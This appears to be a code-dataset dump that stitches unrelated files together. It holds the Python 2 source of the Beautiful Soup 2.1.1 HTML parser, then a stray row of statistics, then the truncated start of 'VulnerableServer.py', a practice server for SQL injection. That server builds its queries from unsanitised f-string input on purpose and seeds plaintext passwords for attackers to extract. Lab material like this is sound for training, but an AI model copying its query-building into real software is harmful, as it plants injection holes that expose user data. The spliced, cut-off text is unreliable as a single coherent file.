A well-formed XML/HTML document will yield a well-formed data
structure. An ill-formed XML/HTML document will yield a
correspondingly ill-formed data structure. If your document is only
locally well-formed, you can use this library to find and process the
well-formed part of it. The BeautifulSoup class has heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup has no external dependencies. It works with Python 2.2
and up.
Beautiful Soup defines classes for four different parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid.
* ICantBelieveItsBeautifulSoup, for parsing valid but bizarre HTML
that trips up BeautifulSoup.
* BeautifulSOAP, for making it easier to parse XML documents that use
lots of subelements containing a single string, where you'd prefer
they put that string into an attribute (such as SOAP messages).
You can subclass BeautifulStoneSoup or BeautifulSoup to create a
parsing strategy specific to an XML schema or a particular bizarre
HTML document. Typically your subclass would just override
SELF_CLOSING_TAGS and/or NESTABLE_TAGS.
""" #"
from __future__ import generators
__author__ = "Leonard Richardson ([email protected])"
__version__ = "2.1.1"
__date__ = "$Date: 2004/10/18 00:14:20 $"
__copyright__ = "Copyright (c) 2004-2005 Leonard Richardson"
__license__ = "PSF"
from _sgmllib_copy import SGMLParser, SGMLParseError
import types
import re
import _sgmllib_copy as sgmllib
class NullType(object):
"""Similar to NoneType with a corresponding singleton instance
'Null' that, unlike None, accepts any message and returns itself.
Examples:
>>> Null("send", "a", "message")("and one more",
... "and what you get still") is Null
True
"""
def __new__(cls): return Null
def __call__(self, *args, **kwargs): return Null
## def __getstate__(self, *args): return Null
def __getattr__(self, attr): return Null
def __getitem__(self, item): return Null
def __setattr__(self, attr, value): pass
def __setitem__(self, item, value): pass
def __len__(self): return 0
# FIXME: is this a python bug? otherwise ``for x in Null: pass``
# never terminates...
def __iter__(self): return iter([])
def __contains__(self, item): return False
def __repr__(self): return "Null"
Null = object.__new__(NullType)
class PageElement:
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=Null, previous=Null):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = Null
self.previousSibling = Null
self.nextSibling = Null
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def findNext(self, name=None, attrs={}, text=None):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._first(self.fetchNext, name, attrs, text)
firstNext = findNext
def fetchNext(self, name=None, attrs={}, text=None, limit=None):
"""Returns all items that match the given criteria and appear
before after Tag in the document."""
return self._fetch(name, attrs, text, limit, self.nextGenerator)
def findNextSibling(self, name=None, attrs={}, text=None):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._first(self.fetchNextSiblings, name, attrs, text)
firstNextSibling = findNextSibling
def fetchNextSiblings(self, name=None, attrs={}, text=None, limit=None):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._fetch(name, attrs, text, limit, self.nextSiblingGenerator)
def findPrevious(self, name=None, attrs={}, text=None):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._first(self.fetchPrevious, name, attrs, text)
def fetchPrevious(self, name=None, attrs={}, text=None, limit=None):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._fetch(name, attrs, text, limit, self.previousGenerator)
firstPrevious = findPrevious
def findPreviousSibling(self, name=None, attrs={}, text=None):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._first(self.fetchPreviousSiblings, name, attrs, text)
firstPreviousSibling = findPreviousSibling
def fetchPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._fetch(name, attrs, text, limit,
self.previousSiblingGenerator)
def findParent(self, name=None, attrs={}):
"""Returns the closest parent of this Tag that matches the given
criteria."""
r = Null
l = self.fetchParents(name, attrs, 1)
if l:
r = l[0]
return r
firstParent = findParent
def fetchParents(self, name=None, attrs={}, limit=None):
"""Returns the parents of this Tag that match the given
criteria."""
return self._fetch(name, attrs, None, limit, self.parentGenerator)
#These methods do the real heavy lifting.
def _first(self, method, name, attrs, text):
r = Null
l = method(name, attrs, text, 1)
if l:
r = l[0]
return r
def _fetch(self, name, attrs, text, limit, generator):
"Iterates over a generator looking for things that match."
if not hasattr(attrs, 'items'):
attrs = {'class' : attrs}
results = []
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
found = None
if isinstance(i, Tag):
if not text:
if not name or self._matches(i, name):
match = True
for attr, matchAgainst in attrs.items():
check = i.get(attr)
if not self._matches(check, matchAgainst):
match = False
break
if match:
found = i
elif text:
if self._matches(i, text):
found = i
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#Generators that can be used to navigate starting from both
#NavigableTexts and Tags.
def nextGenerator(self):
i = self
while i:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i:
i = i.parent
yield i
def _matches(self, chunk, howToMatch):
#print 'looking for %s in %s' % (howToMatch, chunk)
#
# If given a list of items, return true if the list contains a
# text element that matches.
if isList(chunk) and not isinstance(chunk, Tag):
for tag in chunk:
if isinstance(tag, NavigableText) and self._matches(tag, howToMatch):
return True
return False
if callable(howToMatch):
return howToMatch(chunk)
if isinstance(chunk, Tag):
#Custom match methods take the tag as an argument, but all other
#ways of matching match the tag name as a string
chunk = chunk.name
#Now we know that chunk is a string
if not isinstance(chunk, basestring):
chunk = str(chunk)
if hasattr(howToMatch, 'match'):
# It's a regexp object.
return howToMatch.search(chunk)
if isList(howToMatch):
return chunk in howToMatch
if hasattr(howToMatch, 'items'):
return howToMatch.has_key(chunk)
#It's just a string
return str(howToMatch) == chunk
class NavigableText(PageElement):
def __getattr__(self, attr):
"For backwards compatibility, text.string gives you text"
if attr == 'string':
return self
else:
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
class NavigableString(str, NavigableText):
pass
class NavigableUnicodeString(unicode, NavigableText):
pass
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
def __init__(self, name, attrs=None, parent=Null, previous=Null):
"Basic constructor."
self.name = name
if attrs == None:
attrs = []
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in range(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
fetch() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return apply(self.fetch, args, kwargs)
def __getattr__(self, tag):
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.first(tag[:-3])
elif tag.find('__') != 0:
return self.first(tag)
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in range(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self):
"""Renders this tag as a string."""
return str(self)
def __unicode__(self):
return self.__str__(1)
def __str__(self, needUnicode=None, showStructureIndent=None):
"""Returns a string or Unicode representation of this tag and
its contents.
NOTE: since Python's HTML parser consumes whitespace, this
method is not certain to reproduce the whitespace present in
the original string."""
attrs = []
if self.attrs:
for key, val in self.attrs:
attrs.append('%s="%s"' % (key, val))
close = ''
closeTag = ''
if self.isSelfClosing():
close = ' /'
else:
closeTag = '</%s>' % self.name
indentIncrement = None
if showStructureIndent != None:
indentIncrement = showStructureIndent
if not self.hidden:
indentIncrement += 1
contents = self.renderContents(indentIncrement, needUnicode=needUnicode)
if showStructureIndent:
space = '\n%s' % (' ' * showStructureIndent)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if showStructureIndent:
s.append(space)
s.append('<%s%s%s>' % (self.name, attributeString, close))
s.append(contents)
if closeTag and showStructureIndent != None:
s.append(space)
s.append(closeTag)
s = ''.join(s)
isUnicode = type(s) == types.UnicodeType
if needUnicode and not isUnicode:
s = unicode(s)
elif isUnicode and needUnicode==False:
s = str(s)
return s
def prettify(self, needUnicode=None):
return self.__str__(needUnicode, showStructureIndent=True)
def renderContents(self, showStructureIndent=None, needUnicode=None):
"""Renders the contents of this tag as a (possibly Unicode)
string."""
s=[]
for c in self:
text = None
if isinstance(c, NavigableUnicodeString) or type(c) == types.UnicodeType:
text = unicode(c)
elif isinstance(c, Tag):
s.append(c.__str__(needUnicode, showStructureIndent))
elif needUnicode:
text = unicode(c)
else:
text = str(c)
if text:
if showStructureIndent != None:
if text[-1] == '\n':
text = text[:-1]
s.append(text)
return ''.join(s)
#Soup methods
def firstText(self, text, recursive=True):
"""Convenience method to retrieve the first piece of text matching the
given criteria. 'text' can be a string, a regular expression object,
a callable that takes a string and returns whether or not the
string 'matches', etc."""
return self.first(recursive=recursive, text=text)
def fetchText(self, text, recursive=True, limit=None):
"""Convenience method to retrieve all pieces of text matching the
given criteria. 'text' can be a string, a regular expression object,
a callable that takes a string and returns whether or not the
string 'matches', etc."""
return self.fetch(recursive=recursive, text=text, limit=limit)
def first(self, name=None, attrs={}, recursive=True, text=None):
"""Return only the first child of this
Tag matching the given criteria."""
r = Null
l = self.fetch(name, attrs, recursive, text, 1)
if l:
r = l[0]
return r
findChild = first
def fetch(self, name=None, attrs={}, recursive=True, text=None,
limit=None):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._fetch(name, attrs, text, limit, generator)
fetchChildren = fetch
#Utility methods
def isSelfClosing(self):
"""Returns true iff this is a self-closing tag as defined in the HTML
standard.
TODO: This is specific to BeautifulSoup and its subclasses, but it's
used by __str__"""
return self.name in BeautifulSoup.SELF_CLOSING_TAGS
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.contents.append(tag)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
if not getattr(self, 'attrMap'):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def childGenerator(self):
for i in range(0, len(self.contents)):
yield self.contents[i]
raise StopIteration
def recursiveChildGenerator(self):
stack = [(self, 0)]
while stack:
tag, start = stack.pop()
if isinstance(tag, Tag):
for i in range(start, len(tag.contents)):
a = tag.contents[i]
yield a
if isinstance(a, Tag) and tag.contents:
if i < len(tag.contents) - 1:
stack.append((tag, i+1))
stack.append((a, 0))
break
raise StopIteration
def isList(l):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is listlike."""
return hasattr(l, '__iter__') \
or (type(l) in (types.ListType, types.TupleType))
def buildTagMap(default, *args):
"""Turns a list of maps, lists, or scalars into a single map.
Used to build the SELF_CLOSING_TAGS and NESTABLE_TAGS maps out
of lists and partial maps."""
built = {}
for portion in args:
if hasattr(portion, 'items'):
#It's a map. Merge it.
for k,v in portion.items():
built[k] = v
elif isList(portion):
#It's a list. Map each item to the default.
for k in portion:
built[k] = default
else:
#It's a scalar. Map it to the default.
built[portion] = default
return built
class BeautifulStoneSoup(Tag, SGMLParser):
"""This class contains the basic parser and fetch code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
#As a public service we will by default silently replace MS smart quotes
#and similar characters with their HTML or ASCII equivalents.
MS_CHARS = { '\x80' : '€',
'\x81' : ' ',
'\x82' : '‚',
'\x83' : 'ƒ',
'\x84' : '„',
'\x85' : '…',
'\x86' : '†',
'\x87' : '‡',
'\x88' : '⁁',
'\x89' : '%',
'\x8A' : 'Š',
'\x8B' : '<',
'\x8C' : 'Œ',
'\x8D' : '?',
'\x8E' : 'Z',
'\x8F' : '?',
'\x90' : '?',
'\x91' : '‘',
'\x92' : '’',
'\x93' : '“',
'\x94' : '”',
'\x95' : '•',
'\x96' : '–',
'\x97' : '—',
'\x98' : '˜',
'\x99' : '™',
'\x9a' : 'š',
'\x9b' : '>',
'\x9c' : 'œ',
'\x9d' : '?',
'\x9e' : 'z',
'\x9f' : 'Ÿ',}
PARSER_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda(x):x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda(x):'<!' + x.group(1) + '>'),
(re.compile("([\x80-\x9f])"),
lambda(x): BeautifulStoneSoup.MS_CHARS.get(x.group(1)))
]
ROOT_TAG_NAME = '[document]'
def __init__(self, text=None, avoidParserProblems=True,
initialTextIsEverything=True):
"""Initialize this as the 'root tag' and feed in any text to
the parser.
NOTE about avoidParserProblems: sgmllib will process most bad
HTML, and BeautifulSoup has tricks for dealing with some HTML
that kills sgmllib, but Beautiful Soup can nonetheless choke
or lose data if your data uses self-closing tags or
declarations incorrectly. By default, Beautiful Soup sanitizes
its input to avoid the vast majority of these problems. The
problems are relatively rare, even in bad HTML, so feel free
to pass in False to avoidParserProblems if they don't apply to
you, and you'll get better performance. The only reason I have
this turned on by default is so I don't get so many tech
support questions.
The two most common instances of invalid HTML that will choke
sgmllib are fixed by the default parser massage techniques:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
Tag.__init__(self, self.ROOT_TAG_NAME)
if avoidParserProblems \
and not isList(avoidParserProblems):
avoidParserProblems = self.PARSER_MASSAGE
self.avoidParserProblems = avoidParserProblems
SGMLParser.__init__(self)
self.quoteStack = []
self.hidden = 1
self.reset()
if hasattr(text, 'read'):
#It's a file-type object.
text = text.read()
if text:
self.feed(text)
if initialTextIsEverything:
self.done()
def __getattr__(self, methodName):
"""This method routes method call requests to either the SGMLParser
superclass or the Tag superclass, depending on the method name."""
if methodName.find('start_') == 0 or methodName.find('end_') == 0 \
or methodName.find('do_') == 0:
return SGMLParser.__getattr__(self, methodName)
elif methodName.find('__') != 0:
return Tag.__getattr__(self, methodName)
else:
raise AttributeError
def feed(self, text):
if self.avoidParserProblems:
for fix, m in self.avoidParserProblems:
text = fix.sub(m, text)
SGMLParser.feed(self, text)
def done(self):
"""Called when you're done parsing, so that the unclosed tags can be
correctly processed."""
self.endData() #NEW
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
SGMLParser.reset(self)
self.currentData = []
self.currentTag = None
self.tagStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
# Tags with just one string-owning child get the child as a
# 'string' property, so that soup.tag.string is shorthand for
# soup.tag.contents[0]
if len(self.currentTag.contents) == 1 and \
isinstance(self.currentTag.contents[0], NavigableText):
self.currentTag.string = self.currentTag.contents[0]
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self):
currentData = ''.join(self.currentData)
if currentData:
if not currentData.strip():
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
c = NavigableString
if type(currentData) == types.UnicodeType:
c = NavigableUnicodeString
o = c(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
self.currentData = []
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<p>Foo<table>Bar<p> should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar<p> should pop to 'tr', not 'p'.
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in range(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurance.
popTo = name
break
if (nestingResetTriggers != None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers == None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s" % name
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not name in self.SELF_CLOSING_TAGS and not selfClosing:
self._smartPop(name)
tag = Tag(name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or name in self.SELF_CLOSING_TAGS:
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
def unknown_endtag(self, name):
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def handle_pi(self, text):
"Propagate processing instructions right through."
self.handle_data("<?%s>" % text)
def handle_comment(self, text):
"Propagate comments right through."
self.handle_data("<!--%s-->" % text)
def handle_charref(self, ref):
"Propagate char refs right through."
self.handle_data('&#%s;' % ref)
def handle_entityref(self, ref):
"Propagate entity refs right through."
self.handle_data('&%s;' % ref)
def handle_decl(self, data):
"Propagate DOCTYPEs and the like right through."
self.handle_data('<!%s>' % data)
def parse_declaration(self, i):
"""Treat a bogus SGML declaration as raw data. Treat a CDATA
declaration as regular data."""
j = None
if self.rawdata[i:i+9] == '<![CDATA[':
k = self.rawdata.find(']]>', i)
if k == -1:
k = len(self.rawdata)
self.handle_data(self.rawdata[i+9:k])
j = k+3
else:
try:
j = SGMLParser.parse_declaration(self, i)
except SGMLParseError:
toHandle = self.rawdata[i:]
self.handle_data(toHandle)
j = i + len(toHandle)
return j
class BeautifulSoup(BeautifulStoneSoup):
"""This parser knows the following facts about HTML:
* Some tags have no closing tag and should be interpreted as being
closed as soon as they are encountered.
* The text inside some tags (ie. 'script') may contain tags which
are not really part of the document and which should be parsed
as text, not tags. If you want to parse the text as tags, you can
always fetch it and parse it explicitly.
* Tag nesting rules:
Most tags can't be nested at all. For instance, the occurance of
a <p> tag should implicitly close the previous <p> tag.
<p>Para1<p>Para2
should be transformed into:
<p>Para1</p><p>Para2
Some tags can be nested arbitrarily. For instance, the occurance
of a <blockquote> tag should _not_ implicitly close the previous
<blockquote> tag.
Alice said: <blockquote>Bob said: <blockquote>Blah
should NOT be transformed into:
Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah
Some tags can be nested, but the nesting is reset by the
interposition of other tags. For instance, a <tr> tag should
implicitly close the previous <tr> tag within the same <table>,
but not close a <tr> tag in another table.
<table><tr>Blah<tr>Blah
should be transformed into:
<table><tr>Blah</tr><tr>Blah
but,
<tr>Blah<table><tr>Blah
should NOT be transformed into
<tr>Blah<table></tr><tr>Blah
Differing assumptions about tag nesting rules are a major source
of problems with the BeautifulSoup class. If BeautifulSoup is not
treating as nestable a tag your page author treats as nestable,
try ICantBelieveItsBeautifulSoup before writing your own
subclass."""
SELF_CLOSING_TAGS = buildTagMap(None, ['br' , 'hr', 'input', 'img', 'meta',
'spacer', 'link', 'frame', 'base'])
QUOTE_TAGS = {'script': None}
#According to the HTML standard, each of these inline tags can
#contain another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup',
'center']
#According to the HTML standard, these block tags can contain
#another tag of the same type. Furthermore, it's common
#to actually use these tags this way.
NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del']
#Lists can contain other lists, but there are restrictions.
NESTABLE_LIST_TAGS = { 'ol' : [],
'ul' : [],
'li' : ['ul', 'ol'],
'dl' : [],
'dd' : ['dl'],
'dt' : ['dl'] }
#Tables can contain other tables, but there are restrictions.
NESTABLE_TABLE_TAGS = {'table' : [],
'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
}
NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
"""The BeautifulSoup class is oriented towards skipping over
common HTML errors like unclosed tags. However, sometimes it makes
errors of its own. For instance, consider this fragment:
<b>Foo<b>Bar</b></b>
This is perfectly valid (if bizarre) HTML. However, the
BeautifulSoup class will implicitly close the first b tag when it
encounters the second 'b'. It will think the author wrote
"<b>Foo<b>Bar", and didn't close the first 'b' tag, because
there's no real-world reason to bold something that's already
bold. When it encounters '</b></b>' it will close two more 'b'
tags, for a grand total of three tags closed instead of two. This
can throw off the rest of your document structure. The same is
true of a number of other tags, listed below.
It's much more common for someone to forget to close (eg.) a 'b'
tag than to actually use nested 'b' tags, and the BeautifulSoup
class handles the common case. This class handles the
not-co-common case: where you can't believe someone wrote what
they did, but it's valid HTML and BeautifulSoup screwed up by
assuming it wouldn't be.
If this doesn't do what you need, try subclassing this class or
BeautifulSoup, and providing your own list of NESTABLE_TAGS."""
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
'big']
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class BeautifulSOAP(BeautifulStoneSoup):
"""This class will push a tag with only a single string child into
the tag's parent as an attribute. The attribute's name is the tag
name, and the value is the string child. An example should give
the flavor of the change:
<foo><bar>baz</bar></foo>
=>
<foo bar="baz"><bar>baz</bar></foo>
You can then access fooTag['bar'] instead of fooTag.barTag.string.
This is, of course, useful for scraping structures that tend to
use subelements instead of attributes, such as SOAP messages. Note
that it modifies its input, so don't print the modified version
out.
I'm not sure how many people really want to use this class; let me
know if you do. Mainly I like the name."""
def popTag(self):
if len(self.tagStack) > 1:
tag = self.tagStack[-1]
parent = self.tagStack[-2]
parent._getAttrMap()
if (isinstance(tag, Tag) and len(tag.contents) == 1 and
isinstance(tag.contents[0], NavigableText) and
not parent.attrMap.has_key(tag.name)):
parent[tag.name] = tag.contents[0]
BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisitude,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
pass
class RobustHTMLParser(BeautifulSoup):
pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
pass
class SimplifyingSOAPParser(BeautifulSOAP):
pass
###
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulStoneSoup(sys.stdin.read())
print soup.prettify()
| 36.779221 | 186 | 0.577434 |
Ethical-Hacking-Scripts | import sqlite3, socket, threading, sys, random
class WebServer:
def __init__(self):
self.logo()
self.valid = False
self.name_list = ["admin adminpassword123456","bobby cheeseburger69","david 19216801","mine craft","jerry password","tom jerry"]
self.names = ["admin", "bobby", "david", "mine", "jerry", "tom"]
self.items = ["cheeseburger","fries","nuggies","fetus","chicken","rtx 3090","i9 11900kf"]
try:
self.ip = sys.argv[1]
self.port = int(sys.argv[2])
self.dbfile = "users.db"
try:
file = open(self.dbfile,"r")
except:
file = open(self.dbfile,"w")
db = sqlite3.connect(self.dbfile)
cursor = db.cursor()
try:
cursor.execute("select * from users")
except:
cursor.execute("create table users(name, password, logins)")
try:
for i in self.name_list:
cursor.execute(f"delete from users where name = '{i.split()[0]}'")
except:
pass
for i in self.name_list:
cursor.execute(f"insert into users values('{i.split()[0]}', '{i.split()[1]}', '0')")
try:
cursor.execute("select * from items")
except:
cursor.execute("create table items(item, price)")
try:
for i in self.items:
cursor.execute(f"delete from items where item = '{i}'")
except:
pass
for i in self.items:
cursor.execute(f"insert into items values('{i}', '${random.randint(10,100)}.{random.randint(10,99)}')")
print(f"\n[+] Try to use SQL Injections to obtain the passwords of these accounts: {self.names}")
print(f"[+] Here are the 'normal' things you can search for: {self.items}\n")
try:
self.externalip = sys.argv[3]
except Exception as e:
self.externalip = self.ip
self.valid = True
db.commit()
cursor.close()
db.close()
except Exception as e:
print("[+] Invalid Arguments!\n[+] Usage: python3 VulnerableServer.py <ip> <port> <externalip>\n[+] Note: The External IP argument is optional.")
if self.valid:
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.ip, self.port))
self.msgs = []
self.packet = self.gen_packet()
print(f"[+] Vulnerable SQL Web Server Started on: {self.ip}:{self.port}")
except Exception as e:
print(f"[+] Server Cannot be started due to Error: {e}")
self.valid = False
def logo(self):
print("""
__ __ _ _ _ _____ ____ _ _____ __ ___
\ \ / / | | | | | | / ____|/ __ \| | / ____| /_ | / _ \
\ \ / / _| |_ __ ___ _ __ __ _| |__ | | ___| (___ | | | | | | (___ ___ _ ____ _____ _ __ __ _| || | | |
\ \/ / | | | | '_ \ / _ \ '__/ _` | '_ \| |/ _ \ ___ \| | | | | \___ \ / _ \ '__\ \ / / _ \ '__| \ \ / / || | | |
\ /| |_| | | | | | __/ | | (_| | |_) | | __/____) | |__| | |____ ____) | __/ | \ V / __/ | \ V /| || |_| |
\/ \__,_|_|_| |_|\___|_| \__,_|_.__/|_|\___|_____/ \___\_\______| |_____/ \___|_| \_/ \___|_| \_/ |_(_)___/
Vulnerable Web Server made for Testing SQL Injections by DrSquid""")
def gen_packet(self, sqlquery="", results=""):
if results != "":
new_packet = "<h2>Search Results:</h2>"
for i in results:
if f"{i[0]} {i[1]}" in results:
pass
else:
